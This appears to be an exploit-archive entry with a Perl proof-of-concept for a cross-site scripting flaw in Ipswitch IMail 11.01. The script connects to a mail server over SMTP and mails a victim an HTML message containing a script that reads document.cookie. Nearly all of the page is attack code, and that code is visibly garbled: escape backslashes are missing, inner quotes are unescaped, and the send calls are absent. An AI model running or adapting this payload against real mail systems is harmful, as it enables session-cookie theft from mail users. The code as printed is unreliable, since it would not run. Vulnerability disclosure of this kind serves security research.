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# Title : Ipswitch IMail 11.01 - XSS Vulnerability
# Published : 2013-04-29
# Author :
# Previous Title : Vivotek IP Cameras Multiple Vulnerabilities
# Next Title : Joomla! <= 3.0.3 (remember.php) - PHP Object Injection Vulnerability

# Exploit Title: Ipswitch IMail 11.01 XSS Vulnerability
# Date: 26-04-2013
# Author: DaOne  aka Mocking Bird
# Vendor Homepage: http://www.ipswitch.com/
# Platform: windows

use Net::SMTP;
# ARGV Check
if ($#ARGV != 2)
    print "nUSAGE: IMail.pl <Mail Server> <Attacker Email> <VicTim Email>n";
$host = $ARGV[0];
$attacker = $ARGV[1];
$victim = $ARGV[2];
# Config SMTP
$smtp = Net::SMTP->new(  Host => $host,
                        Hello => 'Hello world',
                        Timeout => 30)
or die "Couldn't connect to Mail Servern";
# Attacker and Victim email
# Send email
$buffer = "From: XSSn".
"To: testingn".
"Subject: testingn".
"MIME-Version: 1.0n".
"Content-Type: multipart/mixed;n".
"    boundary="--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019"nn".
"Content-Type: text/html;n".
"Content-Transfer-Encoding: quoted-printablenn".
"<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">n".
"<script >alert(document.cookie)</script >n".
print "Send.n";
# Proof http://oi40.tinypic.com/34yw8hz.jpg